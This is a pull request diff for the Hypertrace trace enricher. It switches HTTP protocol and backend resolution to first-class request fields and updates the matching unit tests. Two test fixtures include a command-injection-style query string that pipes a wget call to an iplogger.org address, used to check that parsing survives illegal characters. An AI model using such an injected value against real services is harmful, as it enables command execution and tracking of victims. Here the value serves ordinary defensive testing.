### PR TITLE
Use first class Http fields directly instead of extracting fields out of URL

### DIFF
--- a/hypertrace-trace-enricher/hypertrace-trace-enricher-impl/src/main/java/org/hypertrace/traceenricher/enrichment/enrichers/SpanTypeAttributeEnricher.java
+++ b/hypertrace-trace-enricher/hypertrace-trace-enricher-impl/src/main/java/org/hypertrace/traceenricher/enrichment/enrichers/SpanTypeAttributeEnricher.java
@@ -4,6 +4,8 @@ import org.apache.commons.lang3.StringUtils;
 import org.hypertrace.core.datamodel.AttributeValue;
 import org.hypertrace.core.datamodel.Event;
 import org.hypertrace.core.datamodel.StructuredTrace;
+import org.hypertrace.core.datamodel.eventfields.http.Http;
+import org.hypertrace.core.datamodel.eventfields.http.Request;
 import org.hypertrace.core.datamodel.shared.trace.AttributeValueCreator;
 import org.hypertrace.core.span.constants.RawSpanConstants;
 import org.hypertrace.core.span.constants.v1.Envoy;
@@ -12,20 +14,17 @@ import org.hypertrace.core.span.constants.v1.OCSpanKind;
 import org.hypertrace.core.span.constants.v1.OTSpanTag;
 import org.hypertrace.core.span.constants.v1.SpanNamePrefix;
 import org.hypertrace.traceenricher.enrichedspan.constants.EnrichedSpanConstants;
-import org.hypertrace.traceenricher.enrichedspan.constants.utils.EnrichedSpanUtils;
 import org.hypertrace.traceenricher.enrichedspan.constants.v1.BoundaryTypeValue;
 import org.hypertrace.traceenricher.enrichedspan.constants.v1.CommonAttribute;
 import org.hypertrace.traceenricher.enrichedspan.constants.v1.Protocol;
 import org.hypertrace.traceenricher.enrichment.AbstractTraceEnricher;
 import org.hypertrace.traceenricher.util.Constants;
-import org.hypertrace.traceenricher.util.EnricherUtil;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 
 import javax.annotation.Nonnull;
-import java.net.URI;
-import java.net.URISyntaxException;
 import java.util.Map;
+import java.util.Optional;
 
 /**
  * Enricher that figures out if an event is an entry event and by adding EVENT_TYPE attribute.
@@ -199,19 +198,11 @@ public class SpanTypeAttributeEnricher extends AbstractTraceEnricher {
 
   @Nonnull
   public static Protocol getHttpProtocol(Event event) {
-    Map<String, AttributeValue> attributeMap = event.getAttributes().getAttributeMap();
-
-    // Try to check whether HTTP or HTTPS based on full URL.
-    String fullUrl = EnrichedSpanUtils.getFullHttpUrl(event).orElse(null);
-    if (fullUrl != null) {
-      try {
-        URI uri = new URI(fullUrl);
-        Protocol protocol = NAME_TO_PROTOCOL_MAP.get(uri.getScheme().toUpperCase());
-        if (protocol != null) {
-          return protocol;
-        }
-      } catch (URISyntaxException ignore) {
-        // Ignore these exceptions.
+    Optional<String> scheme = Optional.ofNullable(event.getHttp()).map(Http::getRequest).map(Request::getScheme);
+    if (scheme.isPresent()) {
+      Protocol protocol = NAME_TO_PROTOCOL_MAP.get(scheme.get().toUpperCase());
+      if (protocol != null) {
+        return protocol;
       }
     }
 
@@ -223,7 +214,7 @@ public class SpanTypeAttributeEnricher extends AbstractTraceEnricher {
     boolean hasHttpPrefix = false;
     // Go through all attributes check if there's GRPC attribute. If there are any grpc attribute,
     // then it's not a HTTP protocol
-    for (String attrKey : attributeMap.keySet()) {
+    for (String attrKey : event.getAttributes().getAttributeMap().keySet()) {
       String upperCaseKey = attrKey.toUpperCase();
       if (upperCaseKey.startsWith(HTTP_PROTOCOL_VALUE.toUpperCase())) {
         // just marking if http exists but do not decide on the protocol.

--- a/hypertrace-trace-enricher/hypertrace-trace-enricher-impl/src/main/java/org/hypertrace/traceenricher/enrichment/enrichers/resolver/backend/HttpBackendResolver.java
+++ b/hypertrace-trace-enricher/hypertrace-trace-enricher-impl/src/main/java/org/hypertrace/traceenricher/enrichment/enrichers/resolver/backend/HttpBackendResolver.java
@@ -3,11 +3,10 @@ package org.hypertrace.traceenricher.enrichment.enrichers.resolver.backend;
 import static org.hypertrace.traceenricher.util.EnricherUtil.createAttributeValue;
 import static org.hypertrace.traceenricher.util.EnricherUtil.setAttributeIfExist;
 
-import java.net.URI;
 import java.util.Optional;
 import org.apache.commons.lang3.StringUtils;
 import org.hypertrace.core.datamodel.Event;
-import org.hypertrace.core.datamodel.shared.SpanAttributeUtils;
+import org.hypertrace.core.datamodel.eventfields.http.Request;
 import org.hypertrace.core.datamodel.shared.StructuredTraceGraph;
 import org.hypertrace.core.span.constants.RawSpanConstants;
 import org.hypertrace.core.span.constants.v1.Http;
@@ -25,12 +24,6 @@ import org.slf4j.LoggerFactory;
 public class HttpBackendResolver extends AbstractBackendResolver {
   private static final Logger LOGGER = LoggerFactory.getLogger(HttpBackendResolver.class);
 
-  private static final String HTTP_URL_ATTR = RawSpanConstants.getValue(Http.HTTP_URL_WITH_HTTP);
-  private static final String HTTP_HOST_ATTR = RawSpanConstants.getValue(Http.HTTP_HOST);
-  private static final String HTTP_PATH_ATTR = RawSpanConstants.getValue(Http.HTTP_PATH);
-  private static final String HTTP_REQUEST_URL_ATTR =
-      RawSpanConstants.getValue(Http.HTTP_REQUEST_URL);
-
   public HttpBackendResolver(FQNResolver fqnResolver) {
     super(fqnResolver);
   }
@@ -40,41 +33,19 @@ public class HttpBackendResolver extends AbstractBackendResolver {
     Protocol protocol = EnrichedSpanUtils.getProtocol(event);
 
     if (protocol == Protocol.PROTOCOL_HTTP || protocol == Protocol.PROTOCOL_HTTPS) {
-      String backendUriStr = null;
-      String path = null;
-      if (SpanAttributeUtils.containsAttributeKey(event, HTTP_URL_ATTR)) {
-        backendUriStr = SpanAttributeUtils.getStringAttribute(event, HTTP_URL_ATTR);
-      } else if (SpanAttributeUtils.containsAttributeKey(event, HTTP_REQUEST_URL_ATTR)) {
-        backendUriStr = SpanAttributeUtils.getStringAttribute(event, HTTP_REQUEST_URL_ATTR);
-      }
+      Optional<Request> httpRequest = Optional.ofNullable(event.getHttp())
+              .map(org.hypertrace.core.datamodel.eventfields.http.Http::getRequest);
+      String backend = httpRequest.map(Request::getHost).orElse(null);
+      String path = httpRequest.map(Request::getPath).orElse(null);
 
-      if (StringUtils.isNotEmpty(backendUriStr)) {
-        URI backendURI;
-        try {
-          backendURI = URI.create(backendUriStr);
-          backendUriStr = String.format("%s:%d", backendURI.getHost(), backendURI.getPort());
-          path = backendURI.getPath();
-        } catch (IllegalArgumentException e) {
-          LOGGER.warn("Failed to parse URL string {} to create URI", backendUriStr);
-          backendUriStr = null;
-        }
-      }
-      // if URL string was null or unable to parse URL string, check host attribute
-      if (StringUtils.isEmpty(backendUriStr) && SpanAttributeUtils.containsAttributeKey(event, HTTP_HOST_ATTR)) {
-        backendUriStr = SpanAttributeUtils.getStringAttribute(event, HTTP_HOST_ATTR);
-        if (SpanAttributeUtils.containsAttributeKey(event, HTTP_PATH_ATTR)) {
-          path = SpanAttributeUtils.getStringAttribute(event, HTTP_PATH_ATTR);
-        }
-      }
-
-      if (StringUtils.isEmpty(backendUriStr)) {
+      if (StringUtils.isEmpty(backend)) {
         // Shouldn't reach here.
         LOGGER.warn("Unable to infer a http backend from event: {}", event);
         return Optional.empty();
       }
 
       BackendType type = (protocol == Protocol.PROTOCOL_HTTPS) ? BackendType.HTTPS : BackendType.HTTP;
-      final Builder entityBuilder = getBackendEntityBuilder(type, backendUriStr, event);
+      final Builder entityBuilder = getBackendEntityBuilder(type, backend, event);
       if (StringUtils.isNotEmpty(path)) {
         entityBuilder.putAttributes(
             EntityConstants.getValue(BackendAttribute.BACKEND_ATTRIBUTE_PATH),

--- a/hypertrace-trace-enricher/hypertrace-trace-enricher-impl/src/test/java/org/hypertrace/traceenricher/enrichment/enrichers/resolver/backend/BackendEntityResolverTest.java
+++ b/hypertrace-trace-enricher/hypertrace-trace-enricher-impl/src/test/java/org/hypertrace/traceenricher/enrichment/enrichers/resolver/backend/BackendEntityResolverTest.java
@@ -1,7 +1,6 @@
 package org.hypertrace.traceenricher.enrichment.enrichers.resolver.backend;
 
 import static org.junit.jupiter.api.Assertions.assertEquals;
-import static org.junit.jupiter.api.Assertions.assertTrue;
 import static org.mockito.Mockito.mock;
 import static org.mockito.Mockito.when;
 
@@ -9,7 +8,6 @@ import com.google.common.collect.ImmutableMap;
 import java.nio.ByteBuffer;
 import java.util.Arrays;
 import java.util.Map;
-import java.util.Optional;
 import org.hypertrace.core.datamodel.AttributeValue;
 import org.hypertrace.core.datamodel.Attributes;
 import org.hypertrace.core.datamodel.Event;
@@ -17,11 +15,10 @@ import org.hypertrace.core.datamodel.EventRef;
 import org.hypertrace.core.datamodel.EventRefType;
 import org.hypertrace.core.datamodel.MetricValue;
 import org.hypertrace.core.datamodel.Metrics;
+import org.hypertrace.core.datamodel.eventfields.http.Request;
 import org.hypertrace.core.datamodel.shared.StructuredTraceGraph;
-import org.hypertrace.core.span.constants.RawSpanConstants;
 import org.hypertrace.core.span.constants.v1.Grpc;
 import org.hypertrace.core.span.constants.v1.Http;
-import org.hypertrace.core.span.constants.v1.JaegerAttribute;
 import org.hypertrace.core.span.constants.v1.Mongo;
 import org.hypertrace.core.span.constants.v1.Sql;
 import org.hypertrace.entity.constants.v1.BackendAttribute;
@@ -85,7 +82,14 @@ public class BackendEntityResolverTest extends AbstractAttributeEnricherTest {
         .setEventRefList(Arrays.asList(
             EventRef.newBuilder().setTraceId(ByteBuffer.wrap("random_trace_id".getBytes()))
                 .setEventId(ByteBuffer.wrap("random_event_id".getBytes()))
-                .setRefType(EventRefType.CHILD_OF).build())).build();
+                .setRefType(EventRefType.CHILD_OF).build()))
+            .setHttp(org.hypertrace.core.datamodel.eventfields.http.Http.newBuilder()
+                    .setRequest(Request.newBuilder()
+                            .setHost("dataservice:9394")
+                            .setPath("/product/5d644175551847d7408760b1")
+                            .build())
+                    .build())
+            .build();
 
     final Entity backendEntity = backendEntityResolver.resolveEntity(e, structuredTraceGraph).get();
     assertEquals(backendEntity.getEntityName(), "dataservice.mypastryshop.devcluster:9394");
@@ -138,7 +142,15 @@ public class BackendEntityResolverTest extends AbstractAttributeEnricherTest {
         .setEventRefList(Arrays.asList(
             EventRef.newBuilder().setTraceId(ByteBuffer.wrap("random_trace_id".getBytes()))
                 .setEventId(ByteBuffer.wrap("random_event_id".getBytes()))
-                .setRefType(EventRefType.CHILD_OF).build())).build();
+                .setRefType(EventRefType.CHILD_OF).build()))
+            .setHttp(org.hypertrace.core.datamodel.eventfields.http.Http.newBuilder()
+                    .setRequest(Request.newBuilder()
+                            .setUrl("http://dataservice:9394/product/5d644175551847d7408760b4")
+                            .setHost("dataservice:9394")
+                            .setPath("product/5d644175551847d7408760b4")
+                            .build())
+                    .build())
+            .build();
 
     final Entity backendEntity = backendEntityResolver.resolveEntity(e, structuredTraceGraph).get();
     assertEquals("dataservice.mypastryshop.devcluster:9394", backendEntity.getEntityName());
@@ -185,7 +197,16 @@ public class BackendEntityResolverTest extends AbstractAttributeEnricherTest {
         .setEventRefList(Arrays.asList(
             EventRef.newBuilder().setTraceId(ByteBuffer.wrap("random_trace_id".getBytes()))
                 .setEventId(ByteBuffer.wrap("random_event_id".getBytes()))
-                .setRefType(EventRefType.CHILD_OF).build())).build();
+                .setRefType(EventRefType.CHILD_OF).build()))
+            .setHttp(org.hypertrace.core.datamodel.eventfields.http.Http.newBuilder()
+                    .setRequest(Request.newBuilder()
+                            .setUrl("http://dataservice:9394/userreview?productId=5d644175551847d7408760b4")
+                            .setHost("dataservice:9394")
+                            .setPath("/userreview")
+                            .setQueryString("productId=5d644175551847d7408760b4")
+                            .build())
+                    .build())
+            .build();
 
     final Entity backendEntity = backendEntityResolver.resolveEntity(e, structuredTraceGraph).get();
     assertEquals("dataservice.mypastryshop.devcluster:9394", backendEntity.getEntityName());
@@ -237,7 +258,14 @@ public class BackendEntityResolverTest extends AbstractAttributeEnricherTest {
         .setEventRefList(Arrays.asList(
             EventRef.newBuilder().setTraceId(ByteBuffer.wrap("random_trace_id".getBytes()))
                 .setEventId(ByteBuffer.wrap("random_event_id".getBytes()))
-                .setRefType(EventRefType.CHILD_OF).build())).build();
+                .setRefType(EventRefType.CHILD_OF).build()))
+            .setHttp(org.hypertrace.core.datamodel.eventfields.http.Http.newBuilder()
+                    .setRequest(Request.newBuilder()
+                            .setHost("dataservice:9394")
+                            .setPath("/product/5d644175551847d7408760b1")
+                            .build())
+                    .build())
+            .build();
 
     final Entity backendEntity = backendEntityResolver.resolveEntity(e, structuredTraceGraph).get();
     assertEquals(backendEntity.getEntityName(), "dataservice.mypastryshop.devcluster:9394");
@@ -264,7 +292,7 @@ public class BackendEntityResolverTest extends AbstractAttributeEnricherTest {
   }
 
   @Test
-  public void checkBackendEntityGeneratedFromHttpEventUrlWithIllegalCharacter() {
+  public void checkBackendEntityGeneratedFromHttpEventUrlWithIllegalQueryCharacter() {
     Event e = Event.newBuilder().setCustomerId("__default")
         .setEventId(ByteBuffer.wrap("bdf03dfabf5c70f8".getBytes()))
         .setEntityIdList(Arrays.asList("4bfca8f7-4974-36a4-9385-dd76bf5c8824"))
@@ -291,10 +319,32 @@ public class BackendEntityResolverTest extends AbstractAttributeEnricherTest {
         .setEventRefList(Arrays.asList(
             EventRef.newBuilder().setTraceId(ByteBuffer.wrap("random_trace_id".getBytes()))
                 .setEventId(ByteBuffer.wrap("random_event_id".getBytes()))
-                .setRefType(EventRefType.CHILD_OF).build())).build();
+                .setRefType(EventRefType.CHILD_OF).build()))
+        .setHttp(org.hypertrace.core.datamodel.eventfields.http.Http.newBuilder()
+                .setRequest(Request.newBuilder()
+                        .setUrl("http://dataservice:9394/api/timelines?uri=|%20wget%20https://iplogger.org/1pzQq7")
+                        .setHost("dataservice:9394")
+                        .setPath("/api/timelines")
+                        .setQueryString("uri=|%20wget%20https://iplogger.org/1pzQq")
+                        .build())
+                .build())
+        .build();
 
-    Optional<Entity> backendEntity = backendEntityResolver.resolveEntity(e, structuredTraceGraph);
-    assertTrue(backendEntity.isEmpty());
+    Entity backendEntity = backendEntityResolver.resolveEntity(e, structuredTraceGraph).get();
+    assertEquals("dataservice.mypastryshop.devcluster:9394", backendEntity.getEntityName());
+    assertEquals(3, backendEntity.getIdentifyingAttributesCount());
+    assertEquals("HTTP", backendEntity.getIdentifyingAttributesMap()
+            .get(Constants.getEntityConstant(BackendAttribute.BACKEND_ATTRIBUTE_PROTOCOL)).getValue().getString());
+    assertEquals("dataservice.mypastryshop.devcluster", backendEntity.getIdentifyingAttributesMap()
+            .get(Constants.getEntityConstant(BackendAttribute.BACKEND_ATTRIBUTE_HOST)).getValue().getString());
+    assertEquals("9394", backendEntity.getIdentifyingAttributesMap()
+            .get(Constants.getEntityConstant(BackendAttribute.BACKEND_ATTRIBUTE_PORT)).getValue().getString());
+    assertEquals("egress_http", backendEntity.getAttributesMap()
+            .get(Constants.getEnrichedSpanConstant(Backend.BACKEND_FROM_EVENT)).getValue().getString());
+    assertEquals("62646630336466616266356337306638", backendEntity.getAttributesMap()
+            .get(Constants.getEnrichedSpanConstant(Backend.BACKEND_FROM_EVENT_ID)).getValue().getString());
+    assertEquals("GET", backendEntity.getAttributesMap().
+            get(Constants.getRawSpanConstant(Http.HTTP_METHOD)).getValue().getString());
   }
 
   @Test
@@ -325,7 +375,16 @@ public class BackendEntityResolverTest extends AbstractAttributeEnricherTest {
         .setEventRefList(Arrays.asList(
             EventRef.newBuilder().setTraceId(ByteBuffer.wrap("random_trace_id".getBytes()))
                 .setEventId(ByteBuffer.wrap("random_event_id".getBytes()))
-                .setRefType(EventRefType.CHILD_OF).build())).build();
+                .setRefType(EventRefType.CHILD_OF).build()))
+            .setHttp(org.hypertrace.core.datamodel.eventfields.http.Http.newBuilder()
+                    .setRequest(Request.newBuilder()
+                            .setUrl("http://dataservice:9394/api/timelines?uri=|%20wget%20https://iplogger.org/1pzQq7")
+                            .setHost("dataservice:9394")
+                            .setPath("/api/timelines")
+                            .setQueryString("uri=|%20wget%20https://iplogger.org/1pzQq")
+                            .build())
+                    .build())
+            .build();
 
     final Entity backendEntity = backendEntityResolver.resolveEntity(e, structuredTraceGraph).get();
     assertEquals(backendEntity.getEntityName(), "dataservice.mypastryshop.devcluster:9394");


### PR DESCRIPTION
At some places, we're extracting fields out of HTTP URL but they are already present as first class fields. Not only we're doing extra processing, but this could be error prone as well - like we're using URI to parse the URL string field. The problem with it is that it throws an exception if there are some illegal characters in the query string. These invalid query strings can be potential security threats. However, parsing those string fields with URL object(as done by span-normalizer) works fine.

So, it is better to use the first class Http fields directly instead of extracting them out of URL.

This PR was initially raised in hypertrace-trace-enricher : hypertrace/hypertrace-trace-enricher#47 . Ported it here as hypertrace-trace-enricher has been moved inside hypertrace-ingester